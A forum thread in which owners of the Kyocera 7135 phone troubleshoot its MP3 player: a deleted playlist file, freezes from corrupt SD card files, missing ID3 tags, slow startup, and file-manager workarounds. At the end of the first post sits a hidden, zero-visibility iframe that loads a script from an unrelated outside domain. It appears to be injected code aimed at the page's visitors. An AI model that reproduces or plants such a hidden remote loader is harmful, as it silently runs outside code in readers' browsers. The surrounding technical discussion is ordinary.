+ Reply to Thread
Page 1 of 2 1 2 LastLast

MP3playlist.pdb file

Does anyone know what the MP3playlist.pdb file is used for with the MP3 player software on the 7135?

I deleted it by mistake (stupid), my mp3 player seems to work fine when I listen to tunes from my SD card. I know that the play list for these is stored on the SD in my case. But I was just wondering should I try looking for a replacement MP3playlist.pdb file or stop crying over spilt milk?

Anyone have clue?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Everything’s easy for those who don't know how to do it.

That MP3playlist.pdb is just the list of songs that are on your SD Card. The MP3 player uses this list instead of searching your card for the songs. If the list is not there it just searches the card for the songs and recreatest the list. In other words, there is nothing to worry about. One note is that if you put your MP3's on there with an SD card reader then you have to delete that MP3playlist.pdb every time you update the songs, otherwise the MP3 player will have a bogus list of your songs. The MP3 software provided by kyocera takes care of this for you...
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

Well here's a twist. After using the MP3 player all day yesterday in my search for a stereo headset, the MP3 player craps out now.

Every time I start the player the interface displays and the whole 7135 freezes. Each time this happens I have to do a soft reset of the device. I've tried it about 7x with the same results...the device becomes unresponsive.

Can some copy the MP3playlist.pdb file from their 7135 MP3 player (*not from your SD card) so I can attempt to use it to see if it makes difference.

It's the only thing that has changed that I can think of.

the play list is unique to your list of songs... just delete the one you got and the player will rebuild it... trust me, it doesn't matter and if you put a playslist file in there that doesn't match what you actually have on your device then it may cause more problems
    You should be 10% smarter than the equipment you operate. For some of you, the 7135 is not the best choice of equipment.

I think the songs on the SD card were corrupt. When I removed the SD card and opened the MP3 player the device did not stop responding, worked as normal.

I removed the SD card formatted the card and add more MP3's after creating the /audio dir and it worked.

Hey ctalley, glad to hear that it turned out OK. Any idea what prompted the phone/card/reader to eat those files for lunch? :cheesebur I.e., anything else odd happen, other than deleting the playlist file, which is not a problem? Just looking for potential pitfalls to avoid....

turboCat

I have no idea why that happened. Before formatting the SD card I was able to play the mp3's from the card via my PC in Windows Explorer. But I'll keep you posted.

Here's a word of advice to anyone transferring mp3's directly to an SD card. MAKE SURE YOUR MP3's HAVE ID3 tags! Otherwise they will show up as "blanks" in your playlist. The MP3 player software is apparently incapable of reading a songtitle from the filename, like you may be used to on many Windows players.

Hotsync you might want to amend the faq to include this tidbit that I learned the hard way!

I only have 48 songs in my audio folder yet there is a delay of nearly 20 seconds when I launch MP3 Player as it says "creating list..."

I tried going into Edit and choosing Select None and then only selecting one album's worth of songs. When I close out of the program and come back in it selects all the songs.

I'd like to be able to select songs by artist or by album like i can within Windows Media Player.

Is anyone else experiencing any of these symptoms?

Yep pdageek, same problem here. I can't stand the delay. There should be a way to have it not check the files each time.

Trey--

So everytime you launch MP3 Player all your songs are checked? Dude, this sucks. I was hoping that it was an isolated problem. The MP3 player appears to be written by Kyocera. Are there any other MP3 players available for Palm? The lack of album or artist organization really bites.
    Sorry folks, i know this isn't the end of the world. I know, we should count our blessings, we actually have a 7135.

I did find a work around for those you that don't like the 20 second wait time when you open MP3 Player.

Just pause a song. Use all the other palm features. When you go back into MP3 Player it will return to the song that was paused.

Good work pdageek!
    iPhone therefore iAm.

Pause

Yeah, I do the pause thing from time to time. I usually do it by hitting, for lack of better words, the "End phone call" button, i.e., the one with the red phone. But still, we need a better solution, don't ya'll think?

And another thing ...

And another thing ... I noticed that some of you all refer to the playlist file as MP3playlist.pdb. Mine is just playlist.pdb. Comments?

Question:
    If you pause the MP3 player before exiting, when you come back, do you start at the beginning of that same song, or the exact point you left off? This would be helpful to know if listening to long audiobooks.

Originally posted by wcarlson40
    Question:
    If you pause the MP3 player before exiting, when you come back, do you start at the beginning of that same song, or the exact point you left off? This would be helpful to know if listening to long audiobooks.
    Exact place you left off. Trey is right we do need a better solution. Who knows what the system resource drain is as a result of pausing for hours at a time. It's not like were spinning a CD and i haven't had any problems with other programs while doing this but i'd like a bug fix.

Hotsync did put it in perspective though. To paraphrase, its a pretty good mp3 player on a phone.

:drummer :guitarist

One other work around I came up with but it highlights another flaw with File Manager.

I generally listen to my mp3's by album. I have all songs for a particular album within a folder by the artist name including the album within the audio folder

/audio/krall, diana, when i look

I simply move all songs from this folder from the above folder into the /audio folder and delete the playlist.

This would be great if I could actually use File Manager to move the files from one directory to another on the card.

When I highlight the songs inside the album folder and choose copy or move it only gives me the option to move to the internal.

Ditch that prog and get McFile or Filez..

Filez is freeware and a very good app
    McFile is the absolute best at filemanagement, but it costs money...

Thanks Byrd Dog. I downloaded it tonight and it will help me in this work around.

I also realize that I didn't have the latest version of Launch Em' which supports cards now. My 7135 experience just keeps getting better.